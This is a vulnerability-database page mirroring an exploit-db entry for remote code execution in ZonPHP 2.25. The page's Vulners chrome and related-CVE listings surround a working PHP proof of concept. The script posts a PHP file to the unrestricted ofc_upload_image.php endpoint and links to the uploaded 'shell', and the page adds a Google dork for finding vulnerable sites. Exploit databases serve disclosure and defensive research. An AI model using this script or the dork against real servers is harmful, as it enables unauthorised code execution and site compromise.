Lucene search
+L

ZonPHP 2.25 - Remote Code Execution

🗓️ 20 Oct 2013 00:00:00Reported by Halim CruzitoType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 86 Views

ZonPHP v2.25 RCE Vulnerability - Exploi

Related
Code
ReporterTitlePublishedViews
Family
zdt
zdt
Open Flash Chart 2 Arbitrary File Upload Vulnerability
26 Oct 201300:00
zdt
circl
Circl
CVE-2009-4140
13 Feb 201300:00
circl
circl
Circl
CVE-2011-4275
13 Feb 201300:00
circl
checkpoint_advisories
Check Point Advisories
Joomla ofc_upload_image.php Unrestricted File Upload (CVE-2009-4140)
24 Feb 201400:00
checkpoint_advisories
cve
CVE
CVE-2009-4140
22 Dec 200922:00
cve
cve
CVE
CVE-2011-4275
26 Nov 201102:00
cve
cvelist
Cvelist
CVE-2009-4140
22 Dec 200922:00
cvelist
cvelist
Cvelist
CVE-2011-4275
26 Nov 201102:00
cvelist
debiancve
Debian CVE
CVE-2009-4140
22 Dec 200922:00
debiancve
dsquare
Dsquare
ZonPHP 2.25 File Upload
1 Feb 201400:00
dsquare
Rows per page
# Exploit Title: ZonPHP V2.25 RCE Vulnerability
# Google Dork: intext:"Made by SLAPER"
# Date: 21-10-2013
# Exploit Author: Halim Cruzito
# Vendor Homepage: http://www.slaper.be
# Software Link: http://www.slaper.be/zonPHPv225.zip
# Version: v2.25
# Tested on: Windows 7

# PoC:

<?php

$url = "http://server/";
$path = "ofc/ofc_upload_image.php?name=";
$filename = "up.php";
$data = "<?php phpinfo(); ?>";
$headers = array("User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0",�
"Content-Type: text/plain");


$rc = curl_init();
curl_setopt($rc, CURLOPT_URL, $url.$path.$filename);
curl_setopt($rc, CURLOPT_HTTPHEADER, $headers);
curl_setopt($rc, CURLOPT_POST, 1);
curl_setopt( $rc, CURLOPT_SSL_VERIFYPEER, 1);
curl_setopt($rc, CURLOPT_POSTFIELDS, $data);
curl_setopt($rc, CURLOPT_RETURNTRANSFER, 1);
$ex = curl_exec($rc);
curl_close($rc);�

$shelllink = ''.$url.''.$filename.'';
echo '<a href="'.$shelllink.'" target="blank">Exploited Click Here!</a>';

?>


�===============================================
|Loveto:Karoxx Puyoo ^^ and all Malaysian HaXor |
�===============================================

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

23 Oct 2013 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 27.5
EPSS0.75838
86